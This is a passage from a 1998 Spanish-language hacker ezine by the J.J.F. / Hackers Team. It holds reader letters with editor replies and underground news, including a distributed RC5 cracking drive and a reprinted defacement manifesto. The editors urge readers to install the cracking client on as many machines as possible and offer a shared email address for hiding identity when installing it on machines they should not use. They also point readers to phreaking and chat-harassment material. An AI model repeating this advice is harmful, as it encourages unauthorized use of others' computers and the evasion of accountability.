- cierto esto ? se puede realizar? Como se hace?
-
- A|X-Alan
- al751181@xxxxxxxxxxxxxx
-
- <------>
-
- [ Todo es posible pero ya se sabe que por el IRC, la gente hace maravillas
- ;-) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: charlott@xxxxxxxxxxxxxx (Carlos Orlando Chacon Vergara)
-
- Hola:
- necesito informacion sobre BO y la nea version? Como lo desintalo? paso a
- paso. El trojano esta en mi Pc.
-
- <------>
-
- [ Te recomiendo la siguiente utilidad para eliminar el BO.
-
- http://www.genocide2600.com/~tattooman/new-uploads/boe.exe ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 17 Nov 1998 02:31:08 GMT
- From: "pepe brasas" <muldem@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
-
- hola conde vampiro:
-
- ante todo felicitaros a todos por vuestra pagina y por vuestra pequena
- revistilla que aunque no entienda ni la mitad creo que es bastante buena.
-
- y es por eso por lo que os escribo,porque soy un principiante en esto de
- hackear y en el mundo de la informatica.no tengo ni iedea de como
- hackear una pagina ya que no entiendo la mayoria de los terminos que
- utilizais y tambien porque mi conocimient sobre programacion es muy
- pobre.
- mi ilusion seria poder hackear algunas de las jodidas paginas del poder
- y llegar por lo menos a tener un minimo conocimiento sobre el tema pero
- por ahora no tengo las bases suficientes aunque me gustaria
- adquirirlas.ahora es cuando es el momento en el que tengo que
- pedirte/pediros que si por favor me podriais ayudar aunque solo fuera un
- poquito ahora en el comienzo.
- muchas gracias.
-
- pepe brasas
-
- <------>
-
- [ Como siempre decimos lee nuestro FAQ y este ezine con mucha atencion. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Mon, 16 Nov 1998 15:28:03 GMT
- From: Juan_Carlos_Valdes" <agus23@xxxxxxxxxxxxxx>
- To: "Conde Vampiro"
- Cc: "Conde Vampiro"
- Subject: ayudame porfavor
-
- Me llamo Juan Carlos y soy de Argentina
- Hola como estas, espero que bien, te comento que estoy tratando de iniciarme
- en este ambiente del Hacking, aunque me parece bastante complicado, pero se
- que lo voy a lograr algun dia, es que no estoy pasando una buena situacion
- economica y espero poder safar de esto algun dia. Solo te pido un poco de
- ayuda (si quereis y teneis ganas de ayudarme). Te cuento que se operar,
- programar, y reparar oscea no soy un analfabeto en esto y se que si me
- brindas un poco de tus conocimientos los voy a aprender facilmente yo voy a
- leer todos los documentos que encuentre relacionado con el hacking. El tema
- que me intriga y creo que es lo unico que me va a hacer safar de esto es si
- me podeis enseñar como se hace para sacar dinero de otras cuentas y ponerla
- en la mia. Tengo una tarjeta Banelco del Banco Rio y puedo sacar dinero con
- ella del cajero (Lastima que esta vacia) pero la cuenta esta abierta hasta
- fin de año. Yo lo que queria es pasar dinero de otras cuentas a mi tarjeta
- y sacarla del cajero. ?Me podeis ayudar? Me podeis brindar esa
- informacion? te ruego que me ayudes mi situacion es bastante complicada y
- mis Padres hacen todo lo posible para que siga estudiando. Te cuento que
- estoy en la Facultad y estudio Ingenieria en Sistemas, y me gustaria seguir
- con la carrera, pero todo cuesta dinero y no consigo trabajo por ningun
- lado, y cuando encontras te quieren explotar con poco dinero ($400) y te
- dicen que es Full-Time (9:00 a 21:00hs) y no puedo aceptar porque quiero
- seguir con mi carrera. Ojala que pueda terminarla, mi sueño es poder irme a
- otro pais donde se valoren los conocimiento y no te quieran explotar como
- sucede en Buenos Aires - Argentina. Aca se quieren aprovechar y sacar ventaja
- de cualquier situacion.
- Te cuento la ultima. hace poco fui a Comm1 S.A por un trabajo que ofrecian
- de Tecnico en computacion, esta empresa es la mas importante aqui y estan
- bañados en plata, me preguntaron cuantas horas podria trabajar y yo les
- dije que de las 9 hasta las 17:00, 8hs en total y sabes cuanta plata me
- querian dar? me daban $390 y sin obra social encima, porque decian que eran
- pocas horas las que trabajaba y mas horas yo no podria por la facultad, ese
- dinero que me daban no me servia para nada porque tenia un viaje de 1h 20m
- hasta alli y por mes saque la cuenta me gastaria $150 en viaje. Ves lo que
- te digo. esto lleno de explotadores y me da bronca (te aclaro que $
- dolares, muy poca es la diferencia por ahora) Por eso te pido por favor que
- me ayudes a poder hacer esto. Algun dia te devolvere el favor de alguna
- manera y si haces esto por mi no lo olvidare jamas. Aqui te dejo mi
- direccion electronica para que me escribas. Desde ya te agradezco por leer
- mi carta
- agus23@xxxxxxxxxxxxxx
-
- sin otro particular, te saludo muy atentamente.
-
- <------>
-
- [ No considero que tu situacion justifique el robo de informacion o peor
- todavia monetaria, lo que debes hacer es hablar con la uni sobre una
- beca o conseguir un trabajo gracias a tus conocimientos. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Mon, 23 Nov 1998 08:25:33 GMT
- From: manic_miner@xxxxxxxxxxxxxx
- To: jjf_team@usa.net
- Subject: buena idea.
-
- Estimado colega:
-
- Esto no es un spam.
-
- Seria grato poder contar contigo de una idea que consiste en publicitar,
- por medio de banners tu pagina
- este proyecto es TOTALMENTE GRATUITO, y sin ningun
- tipo de compromiso de tu parte.
-
- Podes ver la prueba en http://www.geocities.com/Baja/Trails/4914/ y en
- http://camaleon.com.ar/sponsors.htm (solo el primer banner)
-
- Si estas interesado podes contactar conmigo en:
- manic_miner@xxxxxxxxxxxxxx
-
- Gracias.
-
- <------>
-
- [ Nosotros ya tenemos la publicidad que querremos :) pero si a alquien le
- interesa pues ya sabe. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Fri, 20 Nov 1998 18:51:05 GMT
- From: "Marcelo F. Lascurain" <mlascu@xxxxxxxxxxxxxx>
- Subject: Problemas con el EZINE
-
- No se si sere el unico pero he tenido problemas para poder bajar el N 6,
- solo me deja hacerlo hasta el curso de linux, y nada mas. Probe como
- indican, apretando SHIFT antes de pinchar en el link, pero nada.
- Sino es demasiado pedir, (disculpen), si pueden enviarmelo por mail, si
- es zipeado mejor.
- Y adelante con su magazine, junto con SET y RAREGAZZ son lo mejor del
- underground.
- Desde Santa Fe, Argentina un cordial saludo.
- Marcelo
-
- <------>
-
- [ Pasate por nuestro FTP. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 18 Nov 1998 14:26:21 GMT
- From: "ortiz jim" <ortiz_jim@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Cc: ortizj@xxxxxxxxxxxxxx
- Subject: Anonmail
-
- ESPAñOL:
- que tal envio este e-mail, solo para preguntar que tan probable es que
- identifiquen mi IP al enviar un
- e-mail para joder, via Telnet, utilizando el puerto 25.
-
- Ha estan excelentes los archivos para hackear, saludos
-
- ENGLISH:
-
- that such I send this e-mail, alone to ask that so probable is that
- identify my ++IP upon sending a e-mail for joder, by ++Telnet, using the
- port 25.
-
- It has are excellent the files for hackear, regards
-
- <------>
-
- [ Te recomiendo el primer curso de hack del primer ezine, ya que alli esta
- todo explicado. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 17 Nov 1998 12:48:06 GMT
- From: "Luis Fernando Tirado Correa" <luisfer32@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
-
- Hola amigos!!
-
- les escribo desde colombia!!
-
- reciban un gran saludo!!
-
- les escribo con el fin de que me manden la traduccion de texto de como
- hacer un blue-box!!
-
- necesito hacer un aparatico de estos porque mi cuenta de servicios es
- gigantesca!!
-
- gracias!! y hasta pronto
-
- <------>
-
- [ Pasate por nuestra seccion de Phreak. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 17 Nov 1998 08:24:28 GMT
- From: TVH <tavaha@xxxxxxxxxxxxxx>
- To: jjf_team
- Subject: peticion
-
- Hola,
- Bueno, a pesar de haber incluido vuestro e-zine ya desde hace tiempo en la
- taberna, nos gustaria, de todas formas pediros permiso para distribuirla en la
- nueva taberna. No creiamos que hiciera falta, puesto que se trata de una
- seccion donde se intenta promocionar los magazines españoles. Aun asi,
- enmendamos el error pidiendoos permiso formalmente.
- Esperamos vuestra respuesta.
- Saludos cordiales.
-
- <------>
-
- [ No hace falta pedirnos permiso, pero es conveniente que nos aviseis para
- que estemos al tanto, os pongamos en el ezine como distribuidores
- oficiales y tb debeis poner nuestro logo de distribuidor.
- Leete nuestro FAQ. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 22 Nov 1998 20:02:22 GMT
- From: "jac" <esesistemas@xxxxxxxxxxxxxx>
- To: <"conde_vampiro@usa.net"@xxxxxxxxxxxxxx>
-
- <------>
-
- [ Si envias un mail pon al menos un mensaje!! ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 22 Nov 1998 17:31:41 GMT
- From: "Juan Carlos" <spawn2@xxxxxxxxxxxxxx>
- Subject: Unix
-
- Hola Conde, creo ke tu revista es genial (y no es por hacer la pelota),
- tiene temas interesantes y los explicais muy bien.
- Veras yo queria pedirte un favor, es que si tienes alguna guia de Unix o
- Linux, alguna especie de manual de comandos y todo lo necesario para
- controlar unix perfectamente
- espero tu respuesta, aqui te dejo mi direccion:
-
- Spaw2@xxxxxxxxxxxxxx
-
- Gracias
-
- <------>
-
- [ Leete el fantastico articulo de Letal en el numero 6 de nuestro ezine. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 22 Nov 1998 13:45:23 GMT
- From: "Bartolome Dominguez Martinez" <tolome@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: sobre todo
-
- hola
- he estado en tu web y hasta el momento ha sido la mejor del tema, pero
- no he podido bajarme nada me haparecia lo del not fount lo siento si soy
- breve pero tengo prisa.
- haber si me podrias mandar datos sonrelas cajas azules y la de cromo
- pero en español.
-
- jhasta otra
- cuento con tigo para que lo hagas.
-
- mi e-mail es tolome@xxxxxxxxxxxxxx
- s
-
- <------>
-
- [ Pasate por nuestra seccion de Phreak. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 01 Dec 1998 21:49:13 GMT
- From: Nicolas Riggeri <nicosr@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Hola conde
-
- Conde,
- como estas?
- espero que me des bola.
- Te cuento que me hace 3 meses no sabia lo que era una computadora hasta
- que me compre una, me esta gustando mucho todo esto y quisiera que me
- enseñaras algo de hackers: lo que me pueden hacer y lo que yo podria
- hacer (no tengo malas intenciones)
- Espero que me enseñes algo.
- Si queres nos podemos juntar en algun chat a conversar ah tambien en icq
- mi numero es el XXXXXXXX o en el poesiacom que es el chat donde yo
- entro como NicoDance.
- Espero tu respuesta, suerte y gracias ...
- ...Chau !
- "Nico"
-
- <------>
-
- [ Lee el FAQ y este ezine!! ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Mon, 30 Nov 1998 11:19:15 GMT
- From: Sire <sire7@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: HOLA
-
- Hey como estas conde_vampiro, bueno te escribo este e-mail agradecerte
- por la informacion publicada acerca del IRC, bueno quiero decirte que
- a mi en lo personal me gusta todo lo que se refiere a descifrar
- password y cosas por el estilo, claro no tengo tus experiencias pero
- creo que eso se va adquiriendo poco a poco, bueno el tema es lo
- siguiente siendo vos uno de los fundadores del JJFHACKERS TEAM mi
- pregunta es como puedo llegar a formar parte de el y recibir
- informacion via e-mail acerca de la novedades surgientes con respecto
- al Team y proyectos.
- Me gustaria si podes que me dieras una mano para que me instruyas un
- poco en algunas dudas..?
-
- Bueno conde_vampiro que comiences bien la semana
-
- <------>
-
- [ Todas tus preguntas son contestadas en el FAQ de nuestro website :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 25 Nov 1998 00:40:14 GMT
- From: alguien@xxxxxxxxxxxxxx
- To: conde_vampiro@usa.net
- Subject: Un paso adelante :)
-
- Veo que estais a punto de estrenar el nuevo dominio JJF.ORG...
- Felicitaciones por ese paso adelante.
-
- Que otras cosas nuevas teneis pensado hacer, una vez que el Dominio este
- activado?
-
- Alguien
-
- <------>
-
- [ Thx, como habras podido comprobar, hemos puesto varias cosillas ;-) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 01 Dec 1998 17:49:06 GMT
- From: <jmrc@xxxxxxxxxxxxxx>
- Subject: Ayuda
-
- Lei, su articulo para asustar usuarios fastidiosos de los chats, ahora
- bien tendran algo que funcione en los chat en JAVA.?
-
- gracias de antemano
-
- <------>
-
- [ Claro, leete bien otra vez la guia, ya que viene explicado. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 01 Dec 1998 17:44:57 GMT
- From: "Rodrigo Da Silva" <noni@@xxxxxxxxxxxxxx>
- To: "J.J.F HACKERS TEAM"
- Subject: Felicitaciones!!!!, su pagina es muy buena
-
- Buenas..., mi nombre es Rodrigo, soy uruguayo, un amigo mio me paso la url
- de su pagina, y queria felicitarlos porque realmente es excelente, he
- conseguido alli cosas muy interesantes, y realmente considero que los
- hackers son unos genios me gustaria formar parte de su equipo, antes no me
- interesaba el tema del hacking, no sabia ni que era, pero despues de que un
- hijo de perra, hizo bolsa mi ordenador con back orifice, en busca de una
- venganza, me he dedicado a bajar programas hacker y cracker, tambien he
- visto en su pagina las ezing o algo asi, que son articulos con curso de
- hacker etc, pero por lo que vi en la pagina de los numeros anteriores segun
- ustedes estan los temas principales, ustedes cuando publican los numeros en
- la pagina, o los mandan por e_mail?
- Otra cosa que es en la que preciso su ayuda, es que yo antes tenia el ICQ98
- y ahora instale el ICQ99, y en el icq98 tenia un crack, el cual me permitia
- autorizar sin el permiso de los otros, me gustaria si ustedes tienen o
- saben de donde puedo sacar un crack igual pero para el icq99, tambien me
- gustaria que me den links para bajar programas para el icq, ya que yo he
- buscado, pero generalmente nunca puedo entrar porque esas paginas estan
- levantadas, otra cosa que me parece interesante, seria sacar los password
- de icq de otra persona, una vez me baje un programa para hacer eso, pero no
- se como funciona.
- Y en otra cosa que quiero que me ayuden es que en la seccion de cracks
- programs de su pagina hay varios cracks pero yo lo que quiero es crackear
- todos los programas shareware, y en su pagina vi uno "nonag" o algo asi que
- cumplia esta funcion, pero no lo puedo bajar, me preguntaba si seria mucho
- pedir que me lo enviaran por mail.
- Yo creo que dañar a las demas personas esta mal, digo esto porque hay
- muchos que usan programas para formatear discos, pero en lo que si estoy de
- acuerdo es en dañar a los que dañan, por eso me gustaria saber si alguno de
- los integrantes tienen el icq, para contactarlos, porque se de algunas
- personas que se dedican a joder gente, como me jodieron a mi.
- En su pagina lei una frase algo asi como :"la informacion pero con etica"
- eso esta muy bien , totalmente de acuerdo, bueno espero que me contesten,
- y que me ayuden con lo que les plantie en este mail, y felicitaciones por
- lo que hacen, que es muy bueno!!!!!
-
- Rodrigo
-
- <------>
-
- [ Thx por los cumplidos y te recomendamos que leas nuestro FAQ. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 01 Dec 1998 13:17:35 GMT
- From: "Mario Masegosa" <sidoshi@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Distribuidor oficial de JJF / Hackers Team
-
- Hola, estoy creando una pßgina que puede ser bastante completa sobre
- temas de IRC, IRC-War y cosas de Hacking, Ingenierφa Social y todo
- esto... por lo que me gustaria que me dierais permiso para convertirme
- en Distribuidor oficial de vuestro e-zine, ya que me parece uno de los
- mas completos e interesantes, aunque hay algun que otro ariticulo, que la
- verdad... de clarificador tiene mas bien poco, pero bueno... lo
- importante es que en general es de los mas interesantes.
- Ademas deciros que si quereis podeis contar conmigo para escribir
- algunos articulos con temas relacionados con el IRC y demas...
-
- Por cierto... tambien estoy tratando de procesar algunos bloques del RC5
- y unirme a vosotros...
-
- Y otra cosa... la direccion recibedetodo@hotmail.com para que se va a
- utilizar?, me refiero a que si me envian un mensaje alli me lo haceis
- llegar vosotros o lo leis vosotros y respondeis vosotros o como va eso?
-
- Muchas gracias.
-
- <------>
-
- [ Para lo del ezine y lo de escribir articulos lee el FAQ :) Sobre la
- cuenta recibedetodo@hotmail.com, no te tienes que preocupar la gestiona
- Mr. Elektro, se utiliza cuando has puesto el RC5 en una maquina que no
- deberias y asi no comprometes tu identidad. ]
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- ------------------------
- - NOTICIAS UNDERGROUND -
- ------------------------
-
- - J.J.F. / HACKERS TEAM -
-
- <────────────────────────────────────────────────────────────────────────────>
- JJF RC5 CRACK TEAM.
-
- Para los que no sepan que es esto exactamente o estan perdidos, aqui
- explicaremos todo lo que necesitais saber. Hemos creado el JJF RC5 Crack
- Team para participar en el concurso internacional para romper el algoritmo
- RC5. Este concurso esta patrocinado por la conocida RSA Inc. la cual
- organiza este concurso para demostrar la fortaleza del RC5, para vendersela
- al Tio Sam ;-)
-
- Empezamos en el puesto 4080 y en el tiempo que llevamos participando
- hemos alcanzado la posicion , para ser exactos llevamos dias en el
- concurso. A nuestro grupo de RC5 se puede unir todo aquel que quiera, ya
- que esta formada por voluntarios, a los cuales les damos las gracias por
- unirse a nuestro equipo :)
-
- Para uniros es realmente facil, por lo que os explicare todos los
- pasos y os queremos ver!!!!
-
- 1- Existen clientes para muy diversas plataformas entre las que escoger,
- bajate el cliente que mas os interese. Lo mejor es pasarse por nuestro
- website, ya que ahi tienes un link directo para bajaros el programa.
-
- 2. Configura el cliente(programa) con tu e-mail.
-
- 3. Procesa y envia (flush) al menos un bloque, pero por supuesto esperamos
- que sean muchos mas :) O sea ejecuta el programa y dejalo correr un rato
- para que rompa los bloques RC5 y despues los subes.
-
- 4. Al dia siguiente chequea tu estatus y edita tu informacion personal en
- http://www.distributed.net/ Si todo esta ok, recibiras un mail con
- un password y te vas al url de distributed.net
-
- 5. En tu informacion personal, en la cual para entrar tienes que meter tu
- password, afiliate al ID:7281 que es el numero del JJF RC5 Crack Team.
-
- 6. Ahora instala el cliente en todas las maquinas que puedas. Usando
- siempre el mismo e-mail para que todos los bloques que envies sean
- asignados a JJF RC5 Crack Team.
-
- Nota: Si no quieres usar tu propio e-mail, puedes usar
- recibedetodo@hotmail.com de forma que si instalas el cliente en una maquina
- donde no deberias haberlo hecho, no comprometeras tu identidad.
- recibedetodo@hotmail.com es parte de JJF RC5 Crack Team.
-
- Como veis es realmente facil o sea que todos a romper el RC5!!!!!
-
- <────────────────────────────────────────────────────────────────────────────>
- HACKERS DE LA FORTUNA.
-
- 10/27/98
-
- Se necesitan Hackers!!
-
- Esto es de libre distribucion.
-
- Por favor, enviar datos a sglennan@mcneiltech.com
-
- Se busca buenos Hackers en el buen sentido de la palabra para
- trabajar para el gobierno (no para el DOD o con informacion sensible) en
- aspecto de seguridad. La edad no importa, pero tiene que ser buenos, ademas
- deberan demostrar conocimiento en todo tipo de redes, especialmente Unix.
-
- Nota de - J.J.F. / Hackers Team -: Esta noticia esta dirigida a los
- Hackers americanos o que esten en suelo americano, por lo que ahi que tener
- dominio del ingles. Simplemente la hemos puesto para que veais que los
- Hackers no son esos tipos que se dedican a atacar servidores y demas
- tonterias, y que incluso los gobiernos los valoran.
-
- <────────────────────────────────────────────────────────────────────────────>
- EL HACK DEL NEW YORK TIMES.
-
- November 1, 1998 3:41 PM PT
-
- Las personas que hackearon el web del New York Times en Septiembre,
- empaquetaron sus ordenadores un dia despues y se los dieron a otros para su
- proteccion personal, afirma la revista Forbes.
-
- En la edicion del Lunes, Forbes dijo que los Hackers, con los nick's
- Slut Puppy y Master Pimp, son de las 2 personas mas buscadas del
- Cyberespacio.
-
- Miembros de un grupo de Hackers conocido como Girlies, tambien han
- invadido otros servidores en Internet, incluyendo Rt66 Internet, un nuevo
- ISP Mexicano, del cual robaron un fichero que contenia miles de tarjetas de
- credito, afirma la revista.
-
- 'Parece que no tiene idea de como lo hicimos o como pararnos' dice
- Slut Puppy.
-
- El reportaje, basado en la exclusiva entrevista con Slut Puppy, dice
- que los hackers atacaron el Times por rabia, ellos no podian aceptar un
- video para mostrar el 13 de Sept. y estabamos enfadados, por lo que nos
- apoderamos del website y cambiamos la pagina de bienvenida por una pagina
- obscena y con desnudos. El periodico denuncio el hack al FBI y el grupo de
- delincuencia informatica del FBI en New York lo esta investigando, confirmo
- Joseph Valiquette, el portavoz del caso en el FBI.
-
- "Ningun cargo a sido imputado y la investigacion todavia sige activa,"
- comento Valiquette.
-
- Nancy Nielsen, un portavoz del periodico, prefiere mantener el
- silencio mientras en caso esta siendo investigado.
-
- "Nosotros tomanos este asunto muy, muy serio y no queremos decir o
- hacer algo que obstruya el caso," comenta ella.
-
- Los hackers tuvieron control total del servidor y los tecnicos del
- Times intentaron recuperar el control, la pagina de los hackers estuvo
- durante unas 3 horas en el cyberespacio. Finalmente los tecnicos
- consiguieron apagar el servidor, el cual contiene las noticias del
- periodico, durante nueve horas.
-
- Despues del asalto, el duo empaqueto sus ordenadores y borro o
- protegio toda prueba de su crime, afirma el Forbes.
-
- Los hackers penetraron Rt66 en Abril y en Agosto, la segunda vez
- robando un fichero con 1.749 numeros de tarjetas de credito, ademas se
- jactan de a ver asaltado el Jet Propulsion Laboratory de la NASA, Motorola
- Inc. y la revista Penthouse, comenta el Forbes.
-
- 'Importantes evidencias.' La cuenta no revela como los hackers lo
- hicieron, pero un portavoz del Forbes dice que los reporteros y los
- editores tienen "importantes evidencias" que no salen en la historia.
-
- No se han dado detalles de las vidas personales de los hackers,
- excepto que han trabajado en la casa de 3 habitaciones de Slut Puppy
- durante seis meses de este año, una habitacion que la revista describe como
- "tan bonita, tan limpia, no parecia el tipico estereotipo hacker."
-
- <────────────────────────────────────────────────────────────────────────────>
- INFORMATION WELFARE HACKEADO POR EL GRUPO SPL0IT.
-
- http://www.unilever.com/
-
- Grupo Spl0it: cellbl0ck - f0bic - jay - nostalg1c
-
- Si, esta pagina de seguridad a sido comprometida!
-
- A todos aquellos que venian a visitar la pagina original, nuestras
- disculpas, tenemos algunas cosas importantes que decir y este parece el
- unico medio para llamar vuestra atencion. Aunque puede parece una tonteria
- esto que tenemos que decir, necesitabamos un sitio importante para decirlo.
-
- El gobierno y los medios de comunicacion han contando muchas cosas
- sobre los hackers. Se supone que debes pensar que somos malas personas, que
- solo quieren desastibilizar la bolsa de Wallstreet y que tengais una vida
- infernal. Dejadme que os diga, nosotros en absoluto somos asi.
-
- Somos gente que se preocupa de la seguridad en Internet y en otras
- plataformas y redes. Sin nosotros, muchos fallos nunca serian descubiertos
- y solo serian conocidos por unos pocos elegidos, que a lo mejor harian
- mal uso de este conocimiento. (Si, los hackers maliciosos existen)
-
- Nosotros somos las personas que levantamos la voz para exigir nuestros
- derechos. No nos olvidemos que tambien son vuestros derechos. Estamos en
- contra de las injusticias que suceden en nuestro mundo, demostramos nuestro
- coraje contra el gobierno para dejar de ser como animales amaestrados. No
- les gusta esto, y por eso nos dan mala imagen. Escojen malos ejemplos de
- hackers (Analyzer, MoD, milw0rm, HFG) y te dicen que todos somos asi.
- PUES NO LO SOMOS#@&! Mirad atentamente. Nosotros somos hackers, pidiendo
- por vuestros derechos, manteniendo al gobierno alejado de vosotros y que no
- os tengan como zombies. Si no callais, entonces quien os protegera?
-
- Nosotros, los hackers, no tenemos problemas raciales. Como es
- mencionado en todos los textos de hackers, vivimos sin color de piel,
- religion o diferencias raciales. Tu [el gobierno] organizas guerras, matas
- personas, robas, nos mientes y nos haceis creer que es por nuestro bien, y
- todavia seguimos siendo los criminales. Bueno, mirad detenidamente.. Quien
- es el criminal? Los hackers, defendiendote, o el gobierno, dandote falsa
- sensacion de proteccion?
-
- Este sitio fue hackeado para llamarte la atencion. No tenemos
- intencion de destrozar nada, hacer que los dueños pierdan dinero o cualquier
- cosa. Solo queremos transmitir nuestro mensaje.
-
- Agradecimientos a:
- No|d, Rhino9, Lords of the Underground, AntiOnline, Chameleon, InterCore y
- a todas aquellas personas que han despertado nuestra conciencia.
-
- Sin agradecimientos a:
- MoD, milw0rm, Analyzer, HFG, Ashtray Lumberjacks. Vosotros dais mala imagen
- a los hackers.
-
- Para terminar, permitirme que plagie a quien nos enseño TRUTH IS A
- VIRUS Chameleon (La verdad es un virus), te queremos!
-
- (Texto extraido del texto de Mentor aunque a lo mejor no esta escrito
- correctamente, pero entiendes lo que queremos decir.)
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- Bueno, pues aqui acaba este magnifico numero o eso pensamos y nos
- vemos en el siguiente numero, pero os aconsejamos que paseis a menudo por
- nuestro dominio, ya que aunque el ezine salga cada dos meses (mas o menos)
- en - J.J.F. / Hackers Team - seguimos trabajando en mas cosas que las iremos
- poniendo en el website.
-
- Ya sabeis para cualquier cosa que nos quieras decir, escribe a nuestro
- buzon pero no antes sin haber leido nuestro FAQ!!!!
-
- editor@jjf.org
-
- FELIZ AñO 1999 Y FELIZ NUEVOS HACK'S
- - J.J.F. / HACKERS TEAM -
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-